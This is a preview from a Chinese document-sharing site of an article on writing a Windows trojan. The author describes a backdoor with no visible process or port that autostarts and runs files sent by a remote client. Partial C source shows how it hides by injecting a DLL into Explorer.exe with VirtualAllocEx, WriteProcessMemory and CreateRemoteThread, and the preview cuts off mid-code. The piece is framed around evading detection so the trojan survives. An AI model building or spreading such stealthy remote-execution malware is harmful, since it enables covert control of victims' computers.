返回
木马编程相关杂谈

木马编程相关杂谈

ID:15478377

大小:30.00 KB

页数:7页

时间:2018-08-03

木马编程相关杂谈_第1页
木马编程相关杂谈_第2页
木马编程相关杂谈_第3页
木马编程相关杂谈_第4页
木马编程相关杂谈_第5页
资源描述:

《木马编程相关杂谈》由会员上传分享,免费在线阅读,更多相关内容在行业资料-天天文库

1、木马编程相关杂谈木马编程相关杂谈我写了这样一个Windows下的程序,服务器端没有进程,没有端口,开机自动运行,可以接收客户端发来的文件并执行文件。只有不被发现的木马才能长寿。木马能接收文件并且执行文件,就可以干任何事。比如搜集系统的信息,只要传一个搜集系统信息的程序,并且执行。其他各种需要的功能也可以写成相应的程序,发送并且执行。隐藏进程也就是为了在Win2K中的Windows任务管理器中看不到。把木马程序做为别的进程中的一个线程运行,这样在Windows任务管理器的进程中就看不到了。要达到这个目的,最简单易用的方法就是把木马程序放在一个dll

2、中,另有一个程序负责将这个dll注入到其他进程,比如Explorer.exe进程中。负责注入dll的程序先用VirtualAllocEx(hRemoteProcess,...)在目标进程中分配一块儿内存,用WriteProcessMemory向该内存中写入要注入的dll的路径和名称,然后利用CreateRemoteThread在目标进程中创建一个线程,这个线程执行LoadLibraryW,并以刚才弄好的那块内存中的dll的路径和名称为参数。这样就使dll载入了目标进程的地址空间,dll的载入将执行dll。这里只是大概的说,详细可以看Jeffrey

3、Richter的《WINDOWS核心编程》第22章,讲的很清楚。而且有非常好的附书的程序做范例22-ImgWalk,22-InjLib。这本书有pdf格式的,在网上找找就可以下载到。我也给出一个自己写的说明这种隐藏方法的程序,相对来说更清楚,更容易看明白。两部分,负责注入的叫NoProcessExe.exe,被注入的dll叫做NoProcessDll.dll。NoProcessExe.exe负责把NoProcessDll.dll注入到Explorer.exe进程中,NoProcessDll.dll中的程序首先获得所在进程的pid,然后用Messa

4、geBox打印出来,以证明它是在Explorer.exe进程中运行的。注意一下NoProcessDll.dll,NoProcessExe.exe要放在同一目录下。Win2K,VC6使用没问题。____________________________________________________________________________________________//NoProcessExe#include#include#include#pragmacomment(li

5、b,"Advapi32.lib")intAPIENTRYWinMain(HINSTANCEhInstance,HINSTANCEhPrevInstance,LPSTRlpCmdLine,intnCmdShow){//////////////////////////////////////////////////////////////查找explorer.exe进程的pid//////////////////////////////////////////////////////////////DWORDpid;HANDLEhSnapshot=N

6、ULL;hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);PROCESSENTRY32pe;pe.dwSize=sizeof(PROCESSENTRY32);Process32First(hSnapshot,&pe);do{if(strcmp(pe.szExeFile,"Explorer.exe")==0){pid=pe.th32ProcessID;break;}}while(Process32Next(hSnapshot,&pe)==TRUE);CloseHandle(hSn

7、apshot);//////////////////////////////////////////////////////////////把dll注入explorer.exe进程//////////////////////////////////////////////////////////////PWSTRpszLibFileRemote=NULL;HANDLEhRemoteProcess=NULL,hRemoteThread=NULL;hRemoteProcess=OpenProcess(PROCESS_QUERY_INFORMATION

8、

9、//RequiredbyAlphaPROCESS_CREATE_THREAD

10、//ForCreateRemoteThreadPROCE

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。